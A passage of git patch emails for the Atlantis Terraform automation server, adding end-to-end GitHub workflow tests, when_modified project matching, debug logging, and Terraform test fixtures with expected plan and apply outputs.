atlantisWorkspace.TestingOverrideCloneURL = fmt.Sprintf("file://%s", repoDir) // Setup test dependencies. @@ -99,14 +100,14 @@ func TestGitHubWorkflow(t *testing.T) { w = httptest.NewRecorder() ctrl.Post(w, commentReq) responseContains(t, w, 200, "Processing...") - _, _, autoplanComment = vcsClient.VerifyWasCalled(Twice()).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + _, _, atlantisComment := vcsClient.VerifyWasCalled(Twice()).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() exp, err = ioutil.ReadFile(filepath.Join(repoDir, expOutputFile)) Ok(t, err) // Replace all 'ID: 1111818181' strings with * so we can do a comparison. idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`) - autoplanComment = idRegex.ReplaceAllString(autoplanComment, "(ID: ******************)") - Equals(t, string(exp), autoplanComment) + atlantisComment = idRegex.ReplaceAllString(atlantisComment, "(ID: ******************)") + Equals(t, string(exp), atlantisComment) } // Finally, send the pull request merged event. @@ -302,3 +303,35 @@ func GitHubPullRequestParsed() *github.PullRequest { }, } } + +// initializeRepo copies the repo data from testfixtures and initializes a new +// git repo in a temp directory. It returns that directory and a function +// to run in a defer that will delete the dir. +// The purpose of this function is to create a real git repository with a branch +// called 'branch' from the files under repoDir. This is so we can check in +// those files normally without needing a .git directory. +func initializeRepo(t *testing.T, repoDir string) (string, func()) { + originRepo, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", repoDir)) + Ok(t, err) + + // Copy the files to the temp dir. + destDir, cleanup := TempDir(t) + runCmd(t, "", "cp", "-r", fmt.Sprintf("%s/.", originRepo), destDir) + + // Initialize the git repo. + runCmd(t, destDir, "git", "init") + runCmd(t, destDir, "git", "add", ".gitkeep") + runCmd(t, destDir, "git", "commit", "-m", "initial commit") + runCmd(t, destDir, "git", "checkout", "-b", "branch") + runCmd(t, destDir, "git", "add", ".") + runCmd(t, destDir, "git", "commit", "-am", "branch commit") + + return destDir, cleanup +} + +func runCmd(t *testing.T, dir string, name string, args ...string) { + cpCmd := exec.Command(name, args...) + cpCmd.Dir = dir + cpOut, err := cpCmd.CombinedOutput() + Assert(t, err == nil, "err running %q: %s", strings.Join(append([]string{name}, args...), " "), cpOut) +} From de5c4061bdc4e019272fb249938353008ccfee8e Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Mon, 18 Jun 2018 10:28:58 +0100 Subject: [PATCH 26/69] Add -var test. --- server/events_controller_e2e_test.go | 18 ++++++++++++--- .../simple/exp-output-apply-var.txt | 13 +++++++++++ .../simple/exp-output-atlantis-plan-var.txt | 23 +++++++++++++++++++ 3 files changed, 51 insertions(+), 3 deletions(-) create mode 100644 server/testfixtures/test-repos/simple/exp-output-apply-var.txt create mode 100644 server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 35795cb3e7..a791a89bda 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -68,10 +68,21 @@ func TestGitHubWorkflow(t *testing.T) { }, ExpMergeCommentFile: "exp-output-merge.txt", }, + { + Description: "simple with comment -var", + RepoDir: "simple", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis plan -- -var var=overridden", "exp-output-atlantis-plan-var.txt", + "atlantis apply", "exp-output-apply-var.txt", + }, + ExpMergeCommentFile: "exp-output-merge.txt", + }, } for _, c := range cases { - ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t) t.Run(c.Description, func(t *testing.T) { + ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t) // Set the repo to be cloned through the testing backdoor. repoDir, cleanup := initializeRepo(t, c.RepoDir) defer cleanup() @@ -100,7 +111,7 @@ func TestGitHubWorkflow(t *testing.T) { w = httptest.NewRecorder() ctrl.Post(w, commentReq) responseContains(t, w, 200, "Processing...") - _, _, atlantisComment := vcsClient.VerifyWasCalled(Twice()).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + _, _, atlantisComment := vcsClient.VerifyWasCalled(Times((i/2)+2)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() exp, err = ioutil.ReadFile(filepath.Join(repoDir, expOutputFile)) Ok(t, err) @@ -115,7 +126,8 @@ func TestGitHubWorkflow(t *testing.T) { w = httptest.NewRecorder() ctrl.Post(w, pullClosedReq) responseContains(t, w, 200, "Pull request cleaned successfully") - _, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(3)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + numPrevComments := (len(c.CommentAndReplies) / 2) + 1 + _, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(numPrevComments+1)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() exp, err = ioutil.ReadFile(filepath.Join(repoDir, c.ExpMergeCommentFile)) Ok(t, err) Equals(t, string(exp), pullClosedComment) diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt new file mode 100644 index 0000000000..3c58045de2 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt @@ -0,0 +1,13 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +this = overridden + +``` + diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt new file mode 100644 index 0000000000..15a712c428 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `.` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + From d9a47361e511ba30f9f281821a643071b9777735 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Mon, 18 Jun 2018 19:55:14 +0100 Subject: [PATCH 27/69] Implement when_modified. --- server/events/command_handler.go | 2 + server/events/event_parser.go | 6 ++ server/events/models/models.go | 4 ++ server/events/project_operator.go | 6 ++ server/events/pull_request_operator.go | 64 +++++++++++++++++-- server/events_controller.go | 14 ++++ server/events_controller_e2e_test.go | 56 ++++++++++++---- .../test-repos/simple-yaml/atlantis.yaml | 24 +++++++ .../simple-yaml/exp-output-apply-default.txt | 14 ++++ .../simple-yaml/exp-output-apply-staging.txt | 14 ++++ .../simple-yaml/exp-output-autoplan.txt | 51 +++++++++++++++ .../simple-yaml/exp-output-merge.txt | 3 + .../test-repos/simple-yaml/main.tf | 15 +++++ .../test-repos/simple-yaml/staging.tfvars | 1 + .../testfixtures/test-repos/simple/.gitkeep | 0 ...exp-output-apply-var-default-workspace.txt | 14 ++++ .../exp-output-apply-var-new-workspace.txt | 14 ++++ .../simple/exp-output-apply-var.txt | 3 +- .../test-repos/simple/exp-output-apply.txt | 3 +- ...exp-output-atlantis-plan-new-workspace.txt | 23 +++++++ ...t-atlantis-plan-var-default-workspace.txt} | 0 .../simple/exp-output-merge-workspaces.txt | 3 + server/testfixtures/test-repos/simple/main.tf | 6 +- 23 files changed, 316 insertions(+), 24 deletions(-) create mode 100644 server/testfixtures/test-repos/simple-yaml/atlantis.yaml create mode 100644 server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt create mode 100644 server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt create mode 100644 server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt create mode 100644 server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt create mode 100644 server/testfixtures/test-repos/simple-yaml/main.tf create mode 100644 server/testfixtures/test-repos/simple-yaml/staging.tfvars delete mode 100644 server/testfixtures/test-repos/simple/.gitkeep create mode 100644 server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt create mode 100644 server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt create mode 100644 server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt rename server/testfixtures/test-repos/simple/{exp-output-atlantis-plan-var.txt => exp-output-atlantis-plan-var-default-workspace.txt} (100%) create mode 100644 server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt diff --git a/server/events/command_handler.go b/server/events/command_handler.go index e327c13ee3..601d3be099 100644 --- a/server/events/command_handler.go +++ b/server/events/command_handler.go @@ -150,6 +150,7 @@ func (c *CommandHandler) run(ctx *CommandContext) { return } + ctx.Log.Debug("updating commit status to pending") if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, ctx.Command); err != nil { ctx.Log.Warn("unable to update commit status: %s", err) } @@ -163,6 +164,7 @@ func (c *CommandHandler) run(ctx *CommandContext) { c.updatePull(ctx, CommandResponse{Failure: errMsg}) return } + ctx.Log.Debug("successfully acquired workspace lock") defer c.AtlantisWorkspaceLocker.Unlock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num) var cr CommandResponse diff --git a/server/events/event_parser.go b/server/events/event_parser.go index bfe08a6c68..448dcee867 100644 --- a/server/events/event_parser.go +++ b/server/events/event_parser.go @@ -14,8 +14,10 @@ package events import ( + "fmt" "path" "regexp" + "strings" "github.com/google/go-github/github" "github.com/lkysow/go-gitlab" @@ -47,6 +49,10 @@ type Command struct { Autoplan bool } +func (c Command) String() string { + return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q autoplan=%t flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.Autoplan, strings.Join(c.Flags, ",")) +} + // NewCommand constructs a Command, setting all missing fields to defaults. func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, autoplan bool) *Command { // If dir was an empty string, this will return '.'. diff --git a/server/events/models/models.go b/server/events/models/models.go index 30faf4ea23..d4ba85fee0 100644 --- a/server/events/models/models.go +++ b/server/events/models/models.go @@ -163,6 +163,10 @@ type Project struct { Path string } +func (p Project) String() string { + return fmt.Sprintf("repofullname=%s path=%s", p.RepoFullName, p.Path) +} + // Plan is the result of running an Atlantis plan command. // This model is used to represent a plan on disk. type Plan struct { diff --git a/server/events/project_operator.go b/server/events/project_operator.go index 2c6c5c558b..5e7e7e43e9 100644 --- a/server/events/project_operator.go +++ b/server/events/project_operator.go @@ -62,10 +62,12 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr if !lockAttempt.LockAcquired { return ProjectResult{Failure: lockAttempt.LockFailureReason} } + ctx.Log.Debug("acquired lock for project") // Ensure project has been cloned. var projAbsPath string if projAbsPathPtr == nil { + ctx.Log.Debug("project has not yet been cloned") repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace) if err != nil { if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil { @@ -74,15 +76,19 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr return ProjectResult{Error: err} } projAbsPath = filepath.Join(repoDir, ctx.RepoRelPath) + ctx.Log.Debug("project successfully cloned to %q", projAbsPath) } else { projAbsPath = *projAbsPathPtr + ctx.Log.Debug("project was already cloned to %q", projAbsPath) } // Use default stage unless another workflow is defined in config stage := p.defaultPlanStage() if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil { + ctx.Log.Debug("project configured to use workflow %q", *ctx.ProjectConfig.Workflow) configuredStage := ctx.GlobalConfig.GetPlanStage(*ctx.ProjectConfig.Workflow) if configuredStage != nil { + ctx.Log.Debug("project will use the configured stage for that workflow") stage = *configuredStage } } diff --git a/server/events/pull_request_operator.go b/server/events/pull_request_operator.go index b393fb5b75..6012214f52 100644 --- a/server/events/pull_request_operator.go +++ b/server/events/pull_request_operator.go @@ -4,7 +4,9 @@ import ( "os" "path/filepath" + "github.com/docker/docker/pkg/fileutils" "github.com/hashicorp/go-version" + "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/yaml" @@ -43,17 +45,24 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon } // Parse config file if it exists. + ctx.Log.Debug("parsing config file") config, err := p.ParserValidator.ReadConfig(repoDir) if err != nil && !os.IsNotExist(err) { return CommandResponse{Error: err} } noAtlantisYAML := os.IsNotExist(err) + if noAtlantisYAML { + ctx.Log.Info("found no %s file", yaml.AtlantisYAMLFilename) + } else { + ctx.Log.Info("successfully parsed %s file", yaml.AtlantisYAMLFilename) + } // We'll need the list of modified files. modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull) if err != nil { return CommandResponse{Error: err} } + ctx.Log.Debug("%d files were modified in this pull request", len(modifiedFiles)) // Prepare the project contexts so the ProjectOperator can execute. var projCtxs []models.ProjectCommandContext @@ -62,6 +71,7 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon // was modified in the pull request. if noAtlantisYAML { modifiedProjects := p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, repoDir) + ctx.Log.Info("automatically determined that there were %d projects modified in this pull request: %s", len(modifiedProjects), modifiedProjects) for _, mp := range modifiedProjects { projCtxs = append(projCtxs, models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, @@ -79,8 +89,16 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon } else { // Otherwise, we use the projects that match the WhenModified fields // in the config file. - matchingProjects := p.matchingProjects(modifiedFiles, config) - for _, mp := range matchingProjects { + matchingProjects, err := p.matchingProjects(ctx.Log, modifiedFiles, config) + if err != nil { + return CommandResponse{Error: err} + } + ctx.Log.Info("%d projects are to be autoplanned based on their when_modified config", len(matchingProjects)) + + // Use for i instead of range because need to get the pointer to the + // project config. + for i := 0; i < len(matchingProjects); i++ { + mp := matchingProjects[i] projCtxs = append(projCtxs, models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, HeadRepo: ctx.HeadRepo, @@ -193,9 +211,41 @@ func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) Comman // matchingProjects returns the list of projects whose WhenModified fields match // any of the modifiedFiles. -func (p *DefaultPullRequestOperator) matchingProjects(modifiedFiles []string, config valid.Spec) []valid.Project { - //todo - // match the modified files against the config - // remember the modified_files paths are relative to the project paths - return nil +func (p *DefaultPullRequestOperator) matchingProjects(log *logging.SimpleLogger, modifiedFiles []string, config valid.Spec) ([]valid.Project, error) { + var projects []valid.Project + for _, project := range config.Projects { + log.Debug("checking if project at dir %q workspace %q was modified", project.Dir, project.Workspace) + if !project.Autoplan.Enabled { + log.Debug("autoplan disabled, ignoring") + continue + } + // Prepend project dir to when modified patterns because the patterns + // are relative to the project dirs but our list of modified files is + // relative to the repo root. + var whenModifiedRelToRepoRoot []string + for _, wm := range project.Autoplan.WhenModified { + whenModifiedRelToRepoRoot = append(whenModifiedRelToRepoRoot, filepath.Join(project.Dir, wm)) + } + pm, err := fileutils.NewPatternMatcher(whenModifiedRelToRepoRoot) + if err != nil { + return nil, errors.Wrapf(err, "matching modified files with patterns: %v", project.Autoplan.WhenModified) + } + + // If any of the modified files matches the pattern then this project is + // considered modified. + for _, file := range modifiedFiles { + match, err := pm.Matches(file) + if err != nil { + log.Debug("match err for file %q: %s", file, err) + continue + } + if match { + log.Debug("file %q matched pattern", file) + projects = append(projects, project) + break + } + } + } + // todo: check if dir is deleted though + return projects, nil } diff --git a/server/events_controller.go b/server/events_controller.go index e9ee6e1e01..d9e344fe55 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -65,6 +65,7 @@ func (e *EventsController) Post(w http.ResponseWriter, r *http.Request) { e.respond(w, logging.Debug, http.StatusBadRequest, "Ignoring request since not configured to support GitHub") return } + e.Logger.Debug("handling GitHub post") e.handleGithubPost(w, r) return } else if r.Header.Get(gitlabHeader) != "" { @@ -72,6 +73,7 @@ func (e *EventsController) Post(w http.ResponseWriter, r *http.Request) { e.respond(w, logging.Debug, http.StatusBadRequest, "Ignoring request since not configured to support GitLab") return } + e.Logger.Debug("handling GitLab post") e.handleGitlabPost(w, r) return } @@ -85,13 +87,16 @@ func (e *EventsController) handleGithubPost(w http.ResponseWriter, r *http.Reque e.respond(w, logging.Warn, http.StatusBadRequest, err.Error()) return } + e.Logger.Debug("request valid") githubReqID := "X-Github-Delivery=" + r.Header.Get("X-Github-Delivery") event, _ := github.ParseWebHook(github.WebHookType(r), payload) switch event := event.(type) { case *github.IssueCommentEvent: + e.Logger.Debug("handling as comment event") e.HandleGithubCommentEvent(w, event, githubReqID) case *github.PullRequestEvent: + e.Logger.Debug("handling as pull request event") e.HandleGithubPullRequestEvent(w, event, githubReqID) default: e.respond(w, logging.Debug, http.StatusOK, "Ignoring unsupported event %s", githubReqID) @@ -144,6 +149,7 @@ func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, p default: eventType = OtherPullEvent } + e.Logger.Info("identified event as type %q", eventType) e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGithubUser, eventType) } @@ -177,6 +183,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep // workspace to '*' to indicate that all applicable dirs and workspaces // should be planned. autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", true) + e.Logger.Info("executing command %s", autoplanCmd) if !e.TestingMode { go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) } else { @@ -206,10 +213,14 @@ func (e *EventsController) handleGitlabPost(w http.ResponseWriter, r *http.Reque e.respond(w, logging.Warn, http.StatusBadRequest, err.Error()) return } + e.Logger.Debug("request valid") + switch event := event.(type) { case gitlab.MergeCommentEvent: + e.Logger.Debug("handling as comment event") e.HandleGitlabCommentEvent(w, event) case gitlab.MergeEvent: + e.Logger.Debug("handling as pull request event") e.HandleGitlabMergeRequestEvent(w, event) default: e.respond(w, logging.Debug, http.StatusOK, "Ignoring unsupported event") @@ -239,6 +250,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-command comment: %q", truncated) return } + e.Logger.Info("parsed comment as %s", parseResult) // At this point we know it's a command we're not supposed to ignore, so now // we check if this repo is allowed to run commands in the first place. @@ -260,6 +272,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo return } + e.Logger.Debug("executing command") fmt.Fprintln(w, "Processing...") if !e.TestingMode { // Respond with success and then actually execute the command asynchronously. @@ -292,6 +305,7 @@ func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter, default: eventType = OtherPullEvent } + e.Logger.Info("identified event as type %q", eventType) e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGitlabUser, eventType) } diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index a791a89bda..e2bb30ff6e 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -58,24 +58,48 @@ func TestGitHubWorkflow(t *testing.T) { ExpMergeCommentFile string CommentAndReplies []string }{ + //{ + // Description: "simple", + // RepoDir: "simple", + // ModifiedFiles: []string{"main.tf"}, + // ExpAutoplanCommentFile: "exp-output-autoplan.txt", + // CommentAndReplies: []string{ + // "atlantis apply", "exp-output-apply.txt", + // }, + // ExpMergeCommentFile: "exp-output-merge.txt", + //}, + //{ + // Description: "simple with comment -var", + // RepoDir: "simple", + // ModifiedFiles: []string{"main.tf"}, + // ExpAutoplanCommentFile: "exp-output-autoplan.txt", + // CommentAndReplies: []string{ + // "atlantis plan -- -var var=overridden", "exp-output-atlantis-plan.txt", + // "atlantis apply", "exp-output-apply-var.txt", + // }, + // ExpMergeCommentFile: "exp-output-merge.txt", + //}, + //{ + // Description: "simple with workspaces", + // RepoDir: "simple", + // ModifiedFiles: []string{"main.tf"}, + // ExpAutoplanCommentFile: "exp-output-autoplan.txt", + // CommentAndReplies: []string{ + // "atlantis plan -- -var var=default_workspace", "exp-output-atlantis-plan.txt", + // "atlantis plan -w new_workspace -- -var var=new_workspace", "exp-output-atlantis-plan-new-workspace.txt", + // "atlantis apply", "exp-output-apply-var-default-workspace.txt", + // "atlantis apply -w new_workspace", "exp-output-apply-var-new-workspace.txt", + // }, + // ExpMergeCommentFile: "exp-output-merge-workspaces.txt", + //}, { - Description: "simple", - RepoDir: "simple", + Description: "simple with atlantis.yaml", + RepoDir: "simple-yaml", ModifiedFiles: []string{"main.tf"}, ExpAutoplanCommentFile: "exp-output-autoplan.txt", CommentAndReplies: []string{ - "atlantis apply", "exp-output-apply.txt", - }, - ExpMergeCommentFile: "exp-output-merge.txt", - }, - { - Description: "simple with comment -var", - RepoDir: "simple", - ModifiedFiles: []string{"main.tf"}, - ExpAutoplanCommentFile: "exp-output-autoplan.txt", - CommentAndReplies: []string{ - "atlantis plan -- -var var=overridden", "exp-output-atlantis-plan-var.txt", - "atlantis apply", "exp-output-apply-var.txt", + "atlantis apply -w staging", "exp-output-apply-staging.txt", + "atlantis apply", "exp-output-apply-default.txt", }, ExpMergeCommentFile: "exp-output-merge.txt", }, @@ -118,6 +142,9 @@ func TestGitHubWorkflow(t *testing.T) { // Replace all 'ID: 1111818181' strings with * so we can do a comparison. idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`) atlantisComment = idRegex.ReplaceAllString(atlantisComment, "(ID: ******************)") + if string(exp) != atlantisComment { + t.Logf("comment: %s", comment) + } Equals(t, string(exp), atlantisComment) } @@ -332,6 +359,7 @@ func initializeRepo(t *testing.T, repoDir string) (string, func()) { // Initialize the git repo. runCmd(t, destDir, "git", "init") + runCmd(t, destDir, "touch", ".gitkeep") runCmd(t, destDir, "git", "add", ".gitkeep") runCmd(t, destDir, "git", "commit", "-m", "initial commit") runCmd(t, destDir, "git", "checkout", "-b", "branch") diff --git a/server/testfixtures/test-repos/simple-yaml/atlantis.yaml b/server/testfixtures/test-repos/simple-yaml/atlantis.yaml new file mode 100644 index 0000000000..62e6047617 --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/atlantis.yaml @@ -0,0 +1,24 @@ +version: 2 +projects: +- dir: . + workspace: default + workflow: default +- dir: . + workspace: staging + workflow: staging +workflows: + default: + # Only specify plan so should use default apply workflow. + plan: + steps: + - init + - plan: + extra_args: [-var, var=fromconfig] + staging: + plan: + steps: + - init + - plan: + extra_args: [-var-file, staging.tfvars] + apply: + steps: [apply] diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt new file mode 100644 index 0000000000..4c1f22f7a9 --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt @@ -0,0 +1,14 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = fromconfig +workspace = default + +``` + diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt new file mode 100644 index 0000000000..d467c8c713 --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt @@ -0,0 +1,14 @@ +Ran Apply in dir: `.` workspace: `staging` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = fromfile +workspace = staging + +``` + diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt new file mode 100644 index 0000000000..6611b1b70b --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt @@ -0,0 +1,51 @@ +Ran Plan for 2 projects: +1. workspace: `default` path: `.` +1. workspace: `staging` path: `.` + +### 1. workspace: `default` path: `.` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). +--- +### 2. workspace: `staging` path: `.` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). +--- + diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt new file mode 100644 index 0000000000..0abe4f2f13 --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `staging` \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple-yaml/main.tf b/server/testfixtures/test-repos/simple-yaml/main.tf new file mode 100644 index 0000000000..39f891a7b0 --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/main.tf @@ -0,0 +1,15 @@ +resource "null_resource" "simple" { + count = "1" +} + +variable "var" { + default = "default" +} + +output "var" { + value = "${var.var}" +} + +output "workspace" { + value = "${terraform.workspace}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple-yaml/staging.tfvars b/server/testfixtures/test-repos/simple-yaml/staging.tfvars new file mode 100644 index 0000000000..6cf6f711e1 --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/staging.tfvars @@ -0,0 +1 @@ +var= "fromfile" \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple/.gitkeep b/server/testfixtures/test-repos/simple/.gitkeep deleted file mode 100644 index e69de29bb2..0000000000 diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt new file mode 100644 index 0000000000..ef14ca06f5 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt @@ -0,0 +1,14 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = default_workspace +workspace = default + +``` + diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt new file mode 100644 index 0000000000..e17039ffce --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt @@ -0,0 +1,14 @@ +Ran Apply in dir: `.` workspace: `new_workspace` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = new_workspace +workspace = new_workspace + +``` + diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt index 3c58045de2..8c49494b4a 100644 --- a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt @@ -7,7 +7,8 @@ Apply complete! Resources: 1 added, 0 changed, 0 destroyed. Outputs: -this = overridden +var = overridden +workspace = default ``` diff --git a/server/testfixtures/test-repos/simple/exp-output-apply.txt b/server/testfixtures/test-repos/simple/exp-output-apply.txt index 4d254afae5..6c123ea8f5 100644 --- a/server/testfixtures/test-repos/simple/exp-output-apply.txt +++ b/server/testfixtures/test-repos/simple/exp-output-apply.txt @@ -7,7 +7,8 @@ Apply complete! Resources: 1 added, 0 changed, 0 destroyed. Outputs: -this = default +var = default +workspace = default ``` diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt new file mode 100644 index 0000000000..2aea0c8cb6 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `.` workspace: `new_workspace` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var-default-workspace.txt similarity index 100% rename from server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt rename to 